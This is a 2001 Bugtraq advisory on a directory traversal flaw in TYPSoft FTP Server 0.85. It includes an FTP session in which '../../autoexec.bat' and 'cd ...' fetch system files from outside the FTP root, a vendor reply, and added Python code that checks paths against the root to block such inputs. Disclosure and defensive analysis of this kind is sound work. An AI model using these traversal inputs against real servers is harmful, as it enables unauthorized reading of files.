Bugtraq mailing list archives

Vulnerability in TYPSoft FTP Server


From: joetesta () HUSHMAIL COM
Date: Wed, 28 Feb 2001 18:27:57 -0500

----- Begin Hush Signed Message from joetesta () hushmail com -----

Vulnerability in TYPSoft FTP Server



    Overview

TYPSoft FTP Server v0.85 is an FTP server available from
http://www.webmasterfree.com and http://typsoft.n3.net.  A vulnerability
exists which allows a remote attacker who can log in to break out of the
FTP root using relative paths: '../' sequences in a file name passed to
RETR are not filtered at all, and while CWD refuses '..', it accepts the
DOS-style '...' (i.e. the parent of the parent directory).



    Details

The following session illustrates the problem.  Note that 'cd ..' is
refused but 'cd ...' is accepted, after which 'get config.sys' retrieves a
file from the directory the operating system resolves '...' to (here
evidently C:\), two levels above the FTP root; 'get ../../autoexec.bat'
succeeds without any traversal check at all:


% ftp localhost
Connected to xxxxxxxxxx.rh.rit.edu.
220 TYPSoft FTP Server 0.85 ready...
User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Password required for jdog.
Password:
230 User jdog logged in.
ftp> pwd
257 "/C:/directory/directory/" is current directory.
ftp> get ../../autoexec.bat
200 Port command successful.
150 Opening data connection for ../../autoexec.bat.
226 Transfer complete.
ftp: 383 bytes received in 0.06Seconds 6.38Kbytes/sec.
ftp> cd ..
501 CWD failed. No permission
ftp> cd ...
250 CWD command successful. "/C:/directory/directory/.../" is current directory.
ftp> pwd
257 "/C:/directory/directory/.../" is current directory.
ftp> get config.sys
200 Port command successful.
150 Opening data connection for config.sys.
226 Transfer complete.
ftp: 89 bytes received in 0.05Seconds 1.78Kbytes/sec.
ftp>
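
The check the server should have made, as an added example that is not part of the original advisory or of TYPSoft's code: resolve every requested path against the user's FTP root with the same semantics the target filesystem uses, and refuse anything that does not stay inside it.  The root string is taken from the PWD reply above; the `naive_allows` filter is a hypothetical reconstruction of a check that rejects only a literal '..' component (consistent with 'cd ..' being denied while 'cd ...' is accepted), included to show what slips past it.  The DOS/Windows 9x rule that '...' means '../..', '....' means '../../..' and so on is assumed to be what made the transcript's 'cd ...' land two directories up.

```python
import posixpath

# Per-user FTP root, taken from the PWD reply in the transcript above.
FTP_ROOT = "/C:/directory/directory"


def dos_expand(component):
    """Expand a component made only of dots the way DOS/Windows 9x does
    (assumed legacy semantics): '..' -> ['..'], '...' -> ['..', '..'],
    '....' -> ['..', '..', '..'].  Any other component is returned unchanged."""
    if len(component) >= 2 and set(component) == {"."}:
        return [".."] * (len(component) - 1)
    return [component]


def naive_allows(path):
    """Hypothetical reconstruction of a filter that behaves like the server in
    the transcript: refuse the request only if some '/'-separated component is
    exactly '..'.  This is not TYPSoft's code; it shows what such a filter misses."""
    return all(comp != ".." for comp in path.split("/"))


def safe_resolve(root, cwd, requested):
    """Return the canonical path for `requested` (relative to `cwd`, or to `root`
    when it starts with '/') if that path stays inside `root`; otherwise None.

    Steps: treat '\\' as a separator too (Windows accepts both), expand DOS-style
    dot components, normalize, then require the result to be the root itself or
    a child of it.  Normalizing with POSIX rules alone is not enough: normpath
    keeps '...' as an ordinary name, while the Windows 9x filesystem resolves it
    to the grandparent, which is exactly what 'cd ...' exploited above."""
    requested = requested.replace("\\", "/")
    parts = []
    for comp in requested.split("/"):
        parts.extend(dos_expand(comp))
    expanded = "/".join(parts)
    if expanded.startswith("/"):
        candidate = posixpath.normpath(root + expanded)
    else:
        candidate = posixpath.normpath(posixpath.join(cwd, expanded))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


def transcript_cases():
    """Run the exact requests from the transcript through both checks, with the
    working directory at the FTP root.  Returns {request: (naive, canonical)}."""
    cwd = FTP_ROOT
    requests = {
        "get ../../autoexec.bat": "../../autoexec.bat",
        "cd ..": "..",
        "cd ...": "...",
        "get config.sys (inside root)": "config.sys",
    }
    return {label: (naive_allows(p), safe_resolve(FTP_ROOT, cwd, p))
            for label, p in requests.items()}


if __name__ == "__main__":
    for label, (naive, canonical) in transcript_cases().items():
        print(f"{label:30} naive filter: {'allow' if naive else 'deny ':5}  "
              f"canonical check: {canonical or 'deny'}")
```

The naive filter lets '...' through, and would also let '..\\..\\autoexec.bat' through on a server that accepts backslashes; the canonical check denies both while still permitting an ordinary 'cd ..' from a subdirectory back up to the root.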



    Solution

Date: Sat, 24 Feb 2001 01:39:23 -0500
Subject: Re: Vulnerability in TYPSoft FTP Server
From: TYPSoft <typsoft () altern org>
To: joetesta () hushmail com

Hi
I have tried to fix this problem.
The tests I have made seem to be OK.
Thanks for the report

Marc
TYPSoft


    Unfortunately, I do not have the resources to verify this fix at
this time.  Thus, I urge users to proceed with caution.



    Vendor Status

TYPSoft was contacted via <typsoft () altern org> on Wednesday, February
21, 2001.



    - Joe Testa  ( e-mail: joetesta () hushmail com / AIM: LordSpankatron )


----- Begin Hush Signature v1.3 -----
CCyeaZ11wOzc4By+rx1GtdKkD9gDG1/WAGHJFUhNZz/sgpcfsBCSqSLWjwIoSl8Atqqv
k83hLlTNlsRS5rzSkS+7yx37hSlR5mwy/2VC0DYd6g8/vMUSp2uQ59wfxZjasWeSx3t/
sA61/cuAT30osMp9YCCy1i4+/7/ReyGJERQQtQIiLuVvN43EWcMVvTGmDJgOqvLErGVu
I4seQjpawANb/Nis9zJbKYjbBycaew5xGeZ8d51tyt8It5sO/Pf7+2lKBYinWk7tV75/
yrkEpVd23MXtn9xW0c+9GiwvUlUTyhKkfQe3crhHxJywTWhbq1MOp5pQMaksAm/87CQc
y8+ZrbDW8SWKh3ozKiot5CgK4gMd2jSbLJ/IUxY8A2GisMU96GyGUTsC7Jzmng9UG/mK
YlWtalAbucV/TJgHFyyy9zbmQ4X+TLez8ewrU6hXnOLwuW9K8Pgt1/2O99mdZMoU+Uuf
g1Obvd2TlDtRwk9MNQcriBktRi03WJIJtomI74GIx5TO
----- End Hush Signature v1.3 -----


This message has been signed with a Hush Digital Signature.
To verify the signature, please go to www.hush.com/tools


Free, encrypted, secure Web-based email at www.hushmail.com
